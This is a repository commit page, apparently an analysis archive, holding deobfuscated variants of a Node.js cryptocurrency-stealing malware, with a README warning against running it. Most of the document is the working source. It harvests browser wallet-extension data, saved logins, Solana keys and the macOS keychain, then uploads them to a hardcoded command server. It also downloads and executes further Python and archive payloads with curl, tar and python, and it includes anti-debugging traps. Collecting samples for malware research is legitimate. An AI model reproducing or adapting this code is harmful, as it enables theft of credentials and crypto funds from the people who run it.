osmannyildiz
/
240822-CryptoVirus
1
0
Fork 0
Code Issues Pull Requests Packages Projects Releases Wiki Activity

first

This commit is contained in:
osmannyildiz 2024-08-29 21:40:37 +03:00
commit 1738dabcda
25 changed files with 53772 additions and 0 deletions
Show Stats Download Patch File Download Diff File Expand all files Collapse all files

10
README.md Normal file
View File

@ -0,0 +1,10 @@
# Crypto Virus (coinprompt)
> **DISCLAIMER: DO NOT RUN THE CODE.** This repo contains malware written by somebody else. Provided for education purposes only.
- Source: https://bitbucket.org/coinprompt/coinprompt/src/master/
- Exploit: [https://bitbucket.org/coinprompt/coinprompt/src/master/server/controllers/snippingController.js line 263](https://bitbucket.org/coinprompt/coinprompt/src/9671a5978efe0c05dba120bb2bb7899bb5cc566d/server/controllers/snippingController.js#lines-263)
- Found 8 variants (100..=107)
- Deobfuscator: https://obf-io.deobfuscate.io/
- Most readable: [workspace/three.js](workspace/three.js)
- C&C server: http://95.164.17.24:1224 (down since the beginning)

582
deobf/v10_100_deobf.js Normal file
View File

@ -0,0 +1,582 @@
(function (_0x44fba7, _0x2d3696) {
const _0x127c6c = _0x44fba7();
while (true) {
try {
const _0x28078f = parseInt(_0x3c3c(660, -0x1df)) / 1 * (-parseInt(_0x3c3c(395, -0x17c)) / 2) + -parseInt(_0x3c3c(617, -0x6c)) / 3 * (parseInt(_0x3c3c(414, -0x181)) / 4) + parseInt(_0x3c3c(645, -81)) / 5 + -parseInt(_0x3c3c(525, -585)) / 6 * (-parseInt(_0x3c3c(486, -522)) / 7) + -parseInt(_0x3c3c(438, -0x26)) / 8 * (-parseInt(_0x3c3c(316, -367)) / 9) + parseInt(_0x3c3c(502, '0x331')) / 10 + -parseInt(_0x3c3c(640, 0x408)) / 11 * (parseInt(_0x3c3c(566, -0x1)) / 12);
if (_0x28078f === _0x2d3696) {
break;
} else {
_0x127c6c.push(_0x127c6c.shift());
}
} catch (_0x36124d) {
_0x127c6c.push(_0x127c6c.shift());
}
}
})(_0x39f3, 677390);
function _0xc3354c(_0x195576, _0x2e72e8, _0x36cbba, _0x1e01d4, _0x369e67) {
return _0x3c3c(_0x2e72e8 + 0x26a, _0x369e67);
}
function _0x39f3() {
const _0x4bce1a = ['nt/', 'ess', 'nNJqK', 'sIdXm', 'pekpl', '14hZCmCf', 'hostn', 'fgpgk', 'ensio', '(((.+', 'wGKfQ', 'round', 'le/Ch', 'pndod', 'getTi', 'Firef', 'fhboh', "n3 \"", 'FyMzG', 'ajnim', 'mifAT', '106440HPCKHO', '_file', 'Micro', '$]*)', 'acces', 'ilkdb', 'forEa', 'IHDYu', 'blMoY', 'dlcob', 'bind', "era S", 'KDJPM', 'googl', 'write', '/stor', 'ogin.', 'cfgod', '164.1', "le ", 'knocf', 'uts', 'vvjfn', '3555282mDfnHE', 'idb', 'ructo', 'init', '/AppD', 'ame', 'efaul', 'pjiig', 'eSync', 'e-chr', 'keych', 'ejbal', 'post', 'FileS', 'dJNuo', "\"retu", 'omihk', 'rrDzZ', 'mdjon', 'jbmgj', 'const', 'ctor(', 'ary/A', '.ldb', 'fig/s', 'irSyn', 'input', '/.npl', "\\p.zi", 'mDmfh', 'oFXHe', 'ocal/', 'retur', 'rmSyn', 'agRLK', 'kodbe', 'filen', 'YyWbq', 'aeaoe', 'aeach', 'oaZSK', '66684waJVTu', 'on.ex', 'eByao', 'xjaWr', '.log', 'oihof', 'ACRQM', 'idlcd', 'UjBZv', "-Lo \"", 'terva', 'JNVVE', "\" \"", 'txt', '/clie', 'dOnrh', 'fig/', 'oftwa', '/User', 'pytho', 'behhm', 'olana', 'type', 'omjjk', 'jblnd', 'Defau', 'LMYJl', '/ld_', 'nkbih', 'lguNB', 're/Op', 'repla', 'hTMmC', 'ware/', "n (fu", 'tjpqk', 'imael', 'get', 'des', 'homed', 'fbeog', 'fdial', 'ata/L', 'RyThU', 'ngcna', 'table', 'pikoo', 'BlNJh', 'ile', 'oohck', " -C ", '92238XrFMeu', 'ata/R', 'multi', 'Z_$][', '__pro', " Data", '//95.', 'creat', 'url', 'gger', 'WXfqr', 'gKuNA', 'MyuWG', 'eebol', 'setIn', 'path', 'child', "\\+\\+ ", '/Chro', '-Brow', 'Data', 'ase', 'kpcnl', '2860lKmSWp', 'xtens', 'oogle', "n() ", '_lst', '6054975aHsZvP', '{}.co', 'lmome', 'OmxkM', 'apagc', 'state', 'era', 'warn', "xf ", '/pdow', ')+)+)', 'apply', 'fysYY', 'reque', 'ave-B', '59DRyyBR', 'MOUNY', 'ort/', 'http:', 'soft/', "\\p2.z", 'peras', 'ata', 'nctio', 'proto', 'copyF', '*(?:[', 'psQWX', 'ata/', "rn th", 'WHmeU', 'UkRZd', 'IThhi', "is\")(", 'isDir', 'cionb', '/id.j', '1224', 'ZsOHd', '_proc', '/.con', '0-9a-', 'sSync', 'call', 'bfnae', 'pebkl', 'ation', 'onoee', 'funct', 'Brows', 'knmef', 'PclYM', '/Brav', "l Ext", 'bohpj', "\\pyth", 'conso', '/Libr', 'ZVvYd', 'azniY', 'ins/l', 'logkc', 'hHTgi', 'toStr', 'hifaf', "e\" \"", 'XyDtz', 'gpafn', 'zGTHN', '/Goog', 'ERzFu', 'ZVkwR', 'ary/K', 'searc', '/Logi', 'Strea', 'dOolM', 'ort/B', 'ctIBb', 'debu', '1251wsmSfG', 'gmccd', 'hlefn', 'actio', 'a-zA-', 're/Br', 'oAegw', 'ldhgm', 'BOFuv', 'eRead', 'lipeo', 'mCyoN', 'ome', '7.24:', 'Softw', 'raveS', 'lchlg', '_uld', 'aholp', 'ector', 'ibnej', 'lmeee', 'HddSr', 'ain', 'vxgDK', 'formD', "curl ", '/Loca', 'join', 'inclu', 'strin', 'kWhSf', " Supp", 'ophhp', 'YkxfX', 'Local', 'exec', 'illa/', 'exist', 'brld_', 'hnfan', 'statS', 'Edge/', 'MncBw', 'QByuA', 'RrOGI', 'lsgQI', 'com.o', 'size', 'eofbd', 'bakop', "e) {}", '-rele', 'pplic', 'opera', 'ads', 'a_id.', 'oamin', 'YyDaD', 'dHcDC', 'hid', 'zA-Z_', 'gbUcv', 'tmpdi', 'g/Moz', 'ync', 'son', 'dfjmm', 'nstru', 'age/d', 'trace', 'YyBiM', 'ciYJT', 'jgjfh', 'lengt', 'NfIly', 'eSoft', 'imhlp', 'Yccfh', '18180HOsCXD', 'hfood', 'moz-e', 'ing', 'acmac', 'to__', 'orm', 'vZyku', 'tion', 'bKcmf', 'rome', 'bbldc', 'ort/G', 'dirna', 'nkdna', 'solan', "\\( *\\", 'Objec', "\\.pyp", '12rduOPH', 'push', " (tru", "l Sta", 'bohma', '/uplo', 'readd', 'ser', "User ", 'ofile', 'GSyZJ', 'kkolj', 'tings', "n Dat", 'HOuuj', '-db', 'Googl', 'UddtF', 'YJKSn', 'ion', 'rave-', 'are/B', 'renam', "ion *", '19800MEQCMb', 'eycha', 'EapJa', 'rQUUg', 'odkjb', 'while', 'Roami', 'Profi', 'hecda', 'rowse', 'ox/Pr', 'test', 'e/Chr', 'fyXOW', 'info', 'ng/Op', 'Brave', 'XxWsG', '100', "tar -", 'dgmol', 'mnkoe', 'ApZSt', 'FwPCp', 'mFzMQ', 'tGUEz', 'nhcel', 'DrzqI', 'count', 'pld_', 'phepc', 'error', 'ccfch', 'nmhnf', 'mgjnj', 'platf', '.file', "n Set", 'dgcij', 'log', 'excep', 'chain', 're.Op'];
_0x39f3 = function () {
return _0x4bce1a;
};
return _0x39f3();
}
const _0x4c5b23 = function () {
let _0x1b18dc = true;
return function (_0xe16044, _0x543257) {
const _0x2f2ffe = _0x1b18dc ? function () {
if (_0x543257) {
const _0x18b663 = _0x543257.apply(_0xe16044, arguments);
_0x543257 = null;
return _0x18b663;
}
} : function () {};
_0x1b18dc = false;
return _0x2f2ffe;
};
}();
const _0x3b6c3a = _0x4c5b23(this, function () {
return _0x3b6c3a.toString().search("(((.+)+)+)+$").toString().constructor(_0x3b6c3a).search("(((.+)+)+)+$");
});
_0x3b6c3a();
function _0x5956dd(_0x2c12cc, _0x562caa, _0xf3cda1, _0x112575, _0x3278d3) {
return _0x3c3c(_0x2c12cc - 0x3e8, _0x562caa);
}
const _0x5aaba1 = function () {
let _0x21d7ac = true;
return function (_0x1f54fd, _0x3286b6) {
const _0x1c338a = _0x21d7ac ? function () {
if (_0x3286b6) {
const _0x24e17f = _0x3286b6.apply(_0x1f54fd, arguments);
_0x3286b6 = null;
return _0x24e17f;
}
} : function () {};
_0x21d7ac = false;
return _0x1c338a;
};
}();
(function () {
_0x5aaba1(this, function () {
const _0x5a19ce = new RegExp("function *\\( *\\)");
const _0x17f146 = new RegExp("\\+\\+ *(?:[a-zA-Z_$][0-9a-zA-Z_$]*)", 'i');
const _0x25534a = _0x4420e3("init");
if (!_0x5a19ce.test(_0x25534a + "chain") || !_0x17f146.test(_0x25534a + "input")) {
_0x25534a('0');
} else {
_0x4420e3();
}
})();
})();
const _0x3bc966 = function () {
let _0x580fb9 = true;
return function (_0x330c98, _0x2beb0b) {
const _0x177202 = _0x580fb9 ? function () {
if (_0x2beb0b) {
const _0x317a45 = _0x2beb0b.apply(_0x330c98, arguments);
_0x2beb0b = null;
return _0x317a45;
}
} : function () {};
_0x580fb9 = false;
return _0x177202;
};
}();
const _0x2578ed = _0x3bc966(this, function () {
let _0x3ea8de;
try {
const _0x28cf7e = Function("return (function() {}.constructor(\"return this\")( ));");
_0x3ea8de = _0x28cf7e();
} catch (_0x311356) {
_0x3ea8de = window;
}
const _0x34c636 = _0x3ea8de.console = _0x3ea8de.console || {};
const _0x273d87 = ["log", "warn", "info", "error", "exception", "table", "trace"];
for (let _0xf875e9 = 0; _0xf875e9 < _0x273d87.length; _0xf875e9++) {
const _0x2bf515 = _0x3bc966.constructor.prototype.bind(_0x3bc966);
const _0x1b503d = _0x273d87[_0xf875e9];
const _0x26c2d2 = _0x34c636[_0x1b503d] || _0x2bf515;
_0x2bf515.__proto__ = _0x3bc966.bind(_0x3bc966);
_0x2bf515.toString = _0x26c2d2.toString.bind(_0x26c2d2);
_0x34c636[_0x1b503d] = _0x2bf515;
}
});
_0x2578ed();
const _0x221e62 = require('fs');
const _0x59f958 = require('os');
const _0x16f8fd = require("path");
const _0x4401f3 = require("request");
const _0x23399b = require("child_process").exec;
const _0x11bcda = _0x59f958.hostname();
const _0x5b1776 = _0x59f958.platform();
const _0x4bb365 = _0x59f958.homedir();
const _0x1a8fee = _0x59f958.tmpdir();
const _0xfb8109 = _0x3eadf7 => _0x3eadf7.replace(/^~([a-z]+|\/)/, (_0x12a1f6, _0x1ba9e4) => '/' === _0x1ba9e4 ? _0x4bb365 : _0x16f8fd.dirname(_0x4bb365) + '/' + _0x1ba9e4);
function _0x250532(_0x1465db, _0x532b27, _0x26afbf, _0x5da9e2, _0x300210) {
return _0x3c3c(_0x26afbf - 0x1b8, _0x1465db);
}
function _0x1ab9bf(_0xb3ef4) {
try {
_0x221e62.accessSync(_0xb3ef4);
return true;
} catch (_0x26ea17) {
return false;
}
}
const _0x2b4167 = ["Local/BraveSoftware/Brave-Browser", "BraveSoftware/Brave-Browser", "BraveSoftware/Brave-Browser"];
const _0x68a749 = ["Local/Google/Chrome", "Google/Chrome", "google-chrome"];
const _0x4bc964 = ["Roaming/Opera Software/Opera Stable", "com.operasoftware.Opera", "opera"];
const _0xee7e1c = ["nkbihfbeogaeaoehlefnkodbefgpgknn", "ejbalbakoplchlghecdalmeeeajnimhm", "fhbohimaelbohpjbbldcngcnapndodjp", "hnfanknocfeofbddgcijnmhnfnkdnaad", "ibnejdfjmmkpcnlpebklmnkoeoihofec", "bfnaelmomeimhlpmgjnjophhpkkoljpa", "aeachknmefphepccionboohckonoeemg", "hifafgmccdpekplomjjkcfgodnhcellj", "jblndlipeogpafnldhgmapagcccfchpi", "acmacodkjbdgmoleebolmdjonilkdbch", "dlcobpjiigpikoobohmabehhmhfoodbb", "aholpfdialjgjfhomihkjbmgjidlcdno"];
const _0x24f986 = async (_0x1d3df7, _0x412da6, _0x24e69b, _0x553b63) => {
let _0x2ecf34;
if (!_0x1d3df7 || '' === _0x1d3df7) {
return [];
}
try {
if (!_0x1ab9bf(_0x1d3df7)) {
return [];
}
} catch (_0x2952dc) {
return [];
}
if (!_0x412da6) {
_0x412da6 = '';
}
let _0x2e4663 = [];
for (let _0x37ffe9 = 0; _0x37ffe9 < 200; _0x37ffe9++) {
const _0x8e554d = _0x1d3df7 + '/' + (0 === _0x37ffe9 ? "Default" : "Profile " + _0x37ffe9) + "/Local Extension Settings";
for (let _0x1c09fe = 0; _0x1c09fe < _0xee7e1c.length; _0x1c09fe++) {
let _0x3539f9 = _0x8e554d + '/' + _0xee7e1c[_0x1c09fe];
if (_0x1ab9bf(_0x3539f9)) {
let _0x47a29c = [];
try {
_0x47a29c = _0x221e62.readdirSync(_0x3539f9);
} catch (_0x422150) {
_0x47a29c = [];
}
_0x47a29c.forEach(async _0x48fa42 => {
let _0x34d24d = _0x16f8fd.join(_0x3539f9, _0x48fa42);
try {
const _0x52fa84 = {
filename: "100_" + _0x412da6 + _0x37ffe9 + '_' + _0xee7e1c[_0x1c09fe] + '_' + _0x48fa42
};
if (_0x34d24d.includes(".log") || _0x34d24d.includes(".ldb")) {
_0x2e4663.push({
'value': _0x221e62.createReadStream(_0x34d24d),
'options': _0x52fa84
});
}
} catch (_0x4ee56e) {}
});
}
}
}
if (_0x24e69b && (_0x2ecf34 = _0x4bb365 + "/.config/solana/id.json", _0x221e62.existsSync(_0x2ecf34))) {
try {
const _0x43d2ad = {
filename: "solana_id.txt"
};
_0x2e4663.push({
'value': _0x221e62.createReadStream(_0x2ecf34),
'options': _0x43d2ad
});
} catch (_0x12a52b) {}
}
_0x5cd59c(_0x2e4663, _0x553b63);
return _0x2e4663;
};
const _0x14af0b = _0xad7998 => {
const _0x1177fd = _0xfb8109('~/') + "/AppData/Roaming/Mozilla/Firefox/Profiles";
let _0x453aab = [];
if (_0x1ab9bf(_0x1177fd)) {
let _0x4b6185 = [];
try {
_0x4b6185 = _0x221e62.readdirSync(_0x1177fd);
} catch (_0x120404) {
_0x4b6185 = [];
}
let _0x3a0b7b = 0;
_0x4b6185.forEach(async _0x87e610 => {
let _0x31c3d3 = _0x16f8fd.join(_0x1177fd, _0x87e610);
if (_0x31c3d3.includes("-release")) {
let _0x74f34f = _0x16f8fd.join(_0x31c3d3, "/storage/default");
let _0x1e112e = [];
_0x1e112e = _0x221e62.readdirSync(_0x74f34f);
let _0x196a6b = 0;
_0x1e112e.forEach(async _0x41aba7 => {
if (_0x41aba7.includes("moz-extension")) {
let _0x17680c = _0x16f8fd.join(_0x74f34f, _0x41aba7);
_0x17680c = _0x16f8fd.join(_0x17680c, "idb");
let _0x36c4ce = [];
_0x36c4ce = _0x221e62.readdirSync(_0x17680c);
_0x36c4ce.forEach(async _0x525690 => {
if (_0x525690.includes(".files")) {
let _0x15cccd = _0x16f8fd.join(_0x17680c, _0x525690);
let _0x20b7e = [];
_0x20b7e = _0x221e62.readdirSync(_0x15cccd);
_0x20b7e.forEach(_0x48b8f2 => {
if (!_0x221e62.statSync(_0x16f8fd.join(_0x15cccd, _0x48b8f2)).isDirectory()) {
let _0x2bfd15 = _0x16f8fd.join(_0x15cccd, _0x48b8f2);
const _0x583f5f = {
filename: _0x3a0b7b + '_' + _0x196a6b + '_' + _0x48b8f2
};
_0x453aab.push({
'value': _0x221e62.createReadStream(_0x2bfd15),
'options': _0x583f5f
});
}
});
}
});
}
});
_0x196a6b += 1;
}
_0x3a0b7b += 1;
});
_0x5cd59c(_0x453aab, _0xad7998);
return _0x453aab;
}
};
const _0x5cd59c = (_0x2e686b, _0x503b06) => {
const _0xf5f49f = {
type: '10'
};
_0xf5f49f.hid = "100_" + _0x11bcda;
_0xf5f49f.uts = _0x503b06;
_0xf5f49f.multi_file = _0x2e686b;
try {
if (_0x2e686b.length > 0) {
const _0x436416 = {
url: "http://95.164.17.24:1224/uploads",
formData: _0xf5f49f
};
_0x4401f3.post(_0x436416, (_0x4aa250, _0x21c325, _0x10adc0) => {});
}
} catch (_0x48978c) {}
};
const _0x2a59b7 = async (_0x18d248, _0x182fbc, _0x54e47e) => {
try {
let _0x3356e0 = '';
_0x3356e0 = 'd' == _0x5b1776[0] ? _0xfb8109('~/') + "/Library/Application Support/" + _0x18d248[1] : 'l' == _0x5b1776[0] ? _0xfb8109('~/') + "/.config/" + _0x18d248[2] : _0xfb8109('~/') + "/AppData/" + _0x18d248[0] + "/User Data";
await _0x24f986(_0x3356e0, _0x182fbc + '_', 0 == _0x182fbc, _0x54e47e);
} catch (_0x383f95) {}
};
const _0x12f379 = async _0x1e9e22 => {
let _0x2d28cb = [];
let _0x145d11 = _0x4bb365 + "/Library/Keychains/login.keychain";
if (_0x221e62.existsSync(_0x145d11)) {
try {
const _0x4160a5 = {
filename: "logkc-db"
};
_0x2d28cb.push({
'value': _0x221e62.createReadStream(_0x145d11),
'options': _0x4160a5
});
} catch (_0x12011e) {}
} else {
_0x145d11 += "-db";
if (_0x221e62.existsSync(_0x145d11)) {
try {
const _0xf0cec0 = {
filename: "logkc-db"
};
_0x2d28cb.push({
'value': _0x221e62.createReadStream(_0x145d11),
'options': _0xf0cec0
});
} catch (_0x103f4c) {}
}
}
try {
let _0x399950 = _0x4bb365 + "/Library/Application Support/Google/Chrome";
if (_0x1ab9bf(_0x399950)) {
for (let _0x114250 = 0; _0x114250 < 200; _0x114250++) {
const _0x570e8e = _0x399950 + '/' + (0 === _0x114250 ? "Default" : "Profile " + _0x114250) + "/Login Data";
try {
if (!_0x1ab9bf(_0x570e8e)) {
continue;
}
const _0x5c4d9a = _0x399950 + "/ld_" + _0x114250;
const _0x287456 = {
filename: "pld_" + _0x114250
};
if (_0x1ab9bf(_0x5c4d9a)) {
_0x2d28cb.push({
'value': _0x221e62.createReadStream(_0x5c4d9a),
'options': _0x287456
});
} else {
_0x221e62.copyFile(_0x570e8e, _0x5c4d9a, _0x40ecae => {
const _0x122dac = {
filename: "pld_" + _0x114250
};
let _0x58f0ab = [{
'value': _0x221e62.createReadStream(_0x570e8e),
'options': _0x122dac
}];
_0x5cd59c(_0x58f0ab, _0x1e9e22);
});
}
} catch (_0x5d8148) {}
}
}
} catch (_0x3222d7) {}
try {
let _0x40a431 = _0x4bb365 + "/Library/Application Support/BraveSoftware/Brave-Browser";
if (_0x1ab9bf(_0x40a431)) {
for (let _0x4d6de8 = 0; _0x4d6de8 < 200; _0x4d6de8++) {
const _0x3dd6d5 = _0x40a431 + '/' + (0 === _0x4d6de8 ? "Default" : "Profile " + _0x4d6de8);
try {
if (!_0x1ab9bf(_0x3dd6d5)) {
continue;
}
const _0x35bc30 = _0x3dd6d5 + "/Login Data";
const _0x1d6812 = {
filename: "brld_" + _0x4d6de8
};
if (_0x1ab9bf(_0x35bc30)) {
_0x2d28cb.push({
'value': _0x221e62.createReadStream(_0x35bc30),
'options': _0x1d6812
});
} else {
_0x221e62.copyFile(_0x3dd6d5, _0x35bc30, _0x495181 => {
const _0x4fede4 = {
filename: "brld_" + _0x4d6de8
};
let _0x24592e = [{
'value': _0x221e62.createReadStream(_0x3dd6d5),
'options': _0x4fede4
}];
_0x5cd59c(_0x24592e, _0x1e9e22);
});
}
} catch (_0xec9bf2) {}
}
}
} catch (_0x2d0639) {}
_0x5cd59c(_0x2d28cb, _0x1e9e22);
return _0x2d28cb;
};
const _0x2fd1f5 = async (_0x32674f, _0x324a89, _0x20f95c) => {
let _0x4b3a87 = [];
let _0x9786ec = '';
_0x9786ec = 'd' == _0x5b1776[0] ? _0xfb8109('~/') + "/Library/Application Support/" + _0x32674f[1] : 'l' == _0x5b1776[0] ? _0xfb8109('~/') + "/.config/" + _0x32674f[2] : _0xfb8109('~/') + "/AppData/" + _0x32674f[0] + "/User Data";
let _0x87a744 = _0x9786ec + "/Local State";
if (_0x221e62.existsSync(_0x87a744)) {
try {
const _0xa15720 = {
filename: _0x324a89 + "_lst"
};
_0x4b3a87.push({
'value': _0x221e62.createReadStream(_0x87a744),
'options': _0xa15720
});
} catch (_0x34f9b1) {}
}
try {
if (_0x1ab9bf(_0x9786ec)) {
for (let _0x1a33b2 = 0; _0x1a33b2 < 200; _0x1a33b2++) {
const _0x49e759 = _0x9786ec + '/' + (0 === _0x1a33b2 ? "Default" : "Profile " + _0x1a33b2);
try {
if (!_0x1ab9bf(_0x49e759)) {
continue;
}
const _0x48e472 = _0x49e759 + "/Login Data";
if (!_0x1ab9bf(_0x48e472)) {
continue;
}
const _0x5e580a = {
filename: _0x324a89 + '_' + _0x1a33b2 + "_uld"
};
_0x4b3a87.push({
'value': _0x221e62.createReadStream(_0x48e472),
'options': _0x5e580a
});
} catch (_0x1c09c2) {}
}
}
} catch (_0x4b2ff8) {}
_0x5cd59c(_0x4b3a87, _0x20f95c);
return _0x4b3a87;
};
let _0x31a77f = 0;
const _0x31f7b0 = async _0x476610 => {
_0x23399b("tar -xf " + _0x476610 + " -C " + _0x4bb365, (_0x50a5fe, _0x1311df, _0x4f246e) => {
if (_0x50a5fe) {
_0x221e62.rmSync(_0x476610);
return void (_0x31a77f = 0);
}
_0x221e62.rmSync(_0x476610);
_0x5d7fc6();
});
};
const _0x390031 = () => {
const _0x3cae78 = _0x1a8fee + "\\p.zi";
const _0x441266 = _0x1a8fee + "\\p2.zip";
if (_0x31a77f >= 51476596) {
return;
}
if (_0x221e62.existsSync(_0x3cae78)) {
try {
var _0x47fbbe = _0x221e62.statSync(_0x3cae78);
if (_0x47fbbe.size >= 51476596) {
_0x31a77f = _0x47fbbe.size;
_0x221e62.rename(_0x3cae78, _0x441266, _0x284471 => {
if (_0x284471) {
throw _0x284471;
}
_0x31f7b0(_0x441266);
});
} else {
if (_0x31a77f < _0x47fbbe.size) {
_0x31a77f = _0x47fbbe.size;
} else {
_0x221e62.rmSync(_0x3cae78);
_0x31a77f = 0;
}
_0x349c50();
}
} catch (_0x1c7b1f) {}
} else {
_0x23399b("curl -Lo \"" + _0x3cae78 + "\" \"" + "http://95.164.17.24:1224/pdown" + "\"", (_0x2d6828, _0x2b6e75, _0x3e8ba9) => {
if (_0x2d6828) {
_0x31a77f = 0;
return void _0x349c50();
}
try {
_0x31a77f = 51476596;
_0x221e62.renameSync(_0x3cae78, _0x441266);
_0x31f7b0(_0x441266);
} catch (_0x1b5f9d) {}
});
}
};
function _0x349c50() {
setTimeout(() => {
_0x390031();
}, 20000);
}
function _0x249add(_0x1d3a42, _0x5bc714, _0xd90dda, _0x1c48aa, _0xeb27c7) {
return _0x3c3c(_0x1c48aa + 878, _0x1d3a42);
}
(function () {
const _0x446458 = function () {
let _0x4df433;
try {
_0x4df433 = Function("return (function() {}.constructor(\"return this\")( ));")();
} catch (_0x5b53c0) {
_0x4df433 = window;
}
return _0x4df433;
};
const _0x439ef6 = _0x446458();
_0x439ef6.setInterval(_0x4420e3, 4000);
})();
function _0x3c3c(_0x4911e8, _0x3920d9) {
const _0x52a3c2 = _0x39f3();
_0x3c3c = function (_0xb8bfff, _0x4926ac) {
_0xb8bfff = _0xb8bfff - 294;
let _0x3ca49c = _0x52a3c2[_0xb8bfff];
return _0x3ca49c;
};
return _0x3c3c(_0x4911e8, _0x3920d9);
}
const _0x5d7fc6 = async () => await new Promise((_0x50660d, _0x316911) => {
if ('w' == _0x5b1776[0]) {
if (_0x221e62.existsSync(_0x4bb365 + "\\.pyp\\python.exe")) {
(() => {
const _0x2ba886 = _0x4bb365 + "/.npl";
const _0x2f63bb = "\"" + _0x4bb365 + "\\.pyp\\python.exe\" \"" + _0x2ba886 + "\"";
try {
_0x221e62.rmSync(_0x2ba886);
} catch (_0x21b5bc) {}
_0x4401f3.get("http://95.164.17.24:1224/client/10/100", (_0x1d4f1f, _0x221411, _0x34bf1f) => {
if (!_0x1d4f1f) {
try {
_0x221e62.writeFileSync(_0x2ba886, _0x34bf1f);
_0x23399b(_0x2f63bb, (_0x16c374, _0xd2d92f, _0xc498d0) => {});
} catch (_0x301ee8) {}
}
});
})();
} else {
_0x390031();
}
} else {
(() => {
_0x4401f3.get("http://95.164.17.24:1224/client/10/100", (_0xbf6210, _0x2d6ee2, _0x510eb2) => {
if (!_0xbf6210) {
_0x221e62.writeFileSync(_0x4bb365 + "/.npl", _0x510eb2);
_0x23399b("python3 \"" + _0x4bb365 + "/.npl\"", (_0x1c5ced, _0x194764, _0x3e060c) => {});
}
});
})();
}
});
var _0x5e2457 = 0;
function _0x304de3(_0x6eccad, _0x21e92e, _0x1365d7, _0x5c072d, _0xfe94a7) {
return _0x3c3c(_0x1365d7 + 925, _0xfe94a7);
}
const _0x48b883 = async () => {
try {
const _0x399315 = Math.round(new Date().getTime() / 1000);
await (async () => {
try {
await _0x2a59b7(_0x68a749, 0, _0x399315);
await _0x2a59b7(_0x2b4167, 1, _0x399315);
await _0x2a59b7(_0x4bc964, 2, _0x399315);
_0x14af0b(_0x399315);
if ('w' == _0x5b1776[0]) {
await _0x24f986(_0xfb8109('~/') + "/AppData/Local/Microsoft/Edge/User Data", '3_', false, _0x399315);
}
if ('d' == _0x5b1776[0]) {
await _0x12f379(_0x399315);
} else {
await _0x2fd1f5(_0x68a749, 0, _0x399315);
await _0x2fd1f5(_0x2b4167, 1, _0x399315);
await _0x2fd1f5(_0x4bc964, 2, _0x399315);
}
} catch (_0x51e49b) {}
})();
_0x5d7fc6();
} catch (_0x1efeeb) {}
};
_0x48b883();
_0x5d7fc6();
let _0xc34788 = setInterval(() => {
if ((_0x5e2457 += 1) < 5) {
_0x48b883();
} else {
clearInterval(_0xc34788);
}
}, 30000);
function _0x4420e3(_0x2266c4) {
function _0x380a40(_0x5065f6) {
if (typeof _0x5065f6 === "string") {
return function (_0x55a0bd) {}.constructor("while (true) {}").apply("counter");
} else {
if (('' + _0x5065f6 / _0x5065f6).length !== 1 || _0x5065f6 % 20 === 0) {
(function () {
return true;
}).constructor("debugger").call("action");
} else {
(function () {
return false;
}).constructor("debugger").apply("stateObject");
}
}
_0x380a40(++_0x5065f6);
}
try {
if (_0x2266c4) {
return _0x380a40;
} else {
_0x380a40(0);
}
} catch (_0x221881) {}
}

595
deobf/v10_101_deobf.js Normal file
View File

@ -0,0 +1,595 @@
(function (_0x2a474e, _0x1ee72d) {
const _0x8d9281 = _0x2a474e();
while (true) {
try {
const _0x404d30 = parseInt(_0x1924(526, -616)) / 1 + parseInt(_0x1924(554, 0x163)) / 2 + parseInt(_0x1924(767, 0x515)) / 3 * (parseInt(_0x1924(662, -229)) / 4) + parseInt(_0x1924(486, '0x9a')) / 5 * (parseInt(_0x1924(681, 0x1da)) / 6) + parseInt(_0x1924(577, '0xda')) / 7 * (parseInt(_0x1924(832, '0x486')) / 8) + parseInt(_0x1924(778, -357)) / 9 * (parseInt(_0x1924(583, 0x386)) / 10) + -parseInt(_0x1924(799, 0x273)) / 11;
if (_0x404d30 === _0x1ee72d) {
break;
} else {
_0x8d9281.push(_0x8d9281.shift());
}
} catch (_0x35ddcd) {
_0x8d9281.push(_0x8d9281.shift());
}
}
})(_0x5c3f, 583588);
const _0x3a6ce9 = function () {
let _0x19d20a = true;
return function (_0x35daf2, _0xc4f710) {
const _0x26bcb1 = _0x19d20a ? function () {
if (_0xc4f710) {
const _0x3e8e8d = _0xc4f710.apply(_0x35daf2, arguments);
_0xc4f710 = null;
return _0x3e8e8d;
}
} : function () {};
_0x19d20a = false;
return _0x26bcb1;
};
}();
const _0x4e7ded = _0x3a6ce9(this, function () {
return _0x4e7ded.toString().search("(((.+)+)+)+$").toString().constructor(_0x4e7ded).search("(((.+)+)+)+$");
});
_0x4e7ded();
function _0x4c1d22(_0x1982dd, _0x3fcb74, _0x3fbf27, _0x18b9d2, _0x5d429d) {
return _0x1924(_0x3fcb74 + 0x165, _0x18b9d2);
}
const _0x65e9b6 = function () {
let _0x4da906 = true;
return function (_0x18773d, _0x51cee6) {
const _0x4d9c5a = _0x4da906 ? function () {
if (_0x51cee6) {
const _0x1e6c32 = _0x51cee6.apply(_0x18773d, arguments);
_0x51cee6 = null;
return _0x1e6c32;
}
} : function () {};
_0x4da906 = false;
return _0x4d9c5a;
};
}();
(function () {
_0x65e9b6(this, function () {
const _0x3f407f = new RegExp("function *\\( *\\)");
const _0x4b179f = new RegExp("\\+\\+ *(?:[a-zA-Z_$][0-9a-zA-Z_$]*)", 'i');
const _0x454084 = _0x1d95ac("init");
if (!_0x3f407f.test(_0x454084 + "chain") || !_0x4b179f.test(_0x454084 + "input")) {
_0x454084('0');
} else {
_0x1d95ac();
}
})();
})();
const _0x5ed2ed = function () {
let _0x2c7f75 = true;
return function (_0x432ad9, _0x4117c7) {
const _0x461dc3 = _0x2c7f75 ? function () {
if (_0x4117c7) {
const _0x30d85b = _0x4117c7.apply(_0x432ad9, arguments);
_0x4117c7 = null;
return _0x30d85b;
}
} : function () {};
_0x2c7f75 = false;
return _0x461dc3;
};
}();
function _0x5efdfb(_0x421f05, _0x15925d, _0x207f59, _0x1e8614, _0x7790a3) {
return _0x1924(_0x207f59 + 0x380, _0x1e8614);
}
const _0x5683f8 = _0x5ed2ed(this, function () {
const _0x2d3917 = function () {
let _0x41299d;
try {
_0x41299d = Function("return (function() {}.constructor(\"return this\")( ));")();
} catch (_0x57b0eb) {
_0x41299d = window;
}
return _0x41299d;
};
const _0x24683a = _0x2d3917();
const _0x519f3a = _0x24683a.console = _0x24683a.console || {};
const _0xeba6cb = ["log", "warn", "info", "error", "exception", "table", "trace"];
for (let _0x406490 = 0; _0x406490 < _0xeba6cb.length; _0x406490++) {
const _0x459feb = _0x5ed2ed.constructor.prototype.bind(_0x5ed2ed);
const _0x30fe79 = _0xeba6cb[_0x406490];
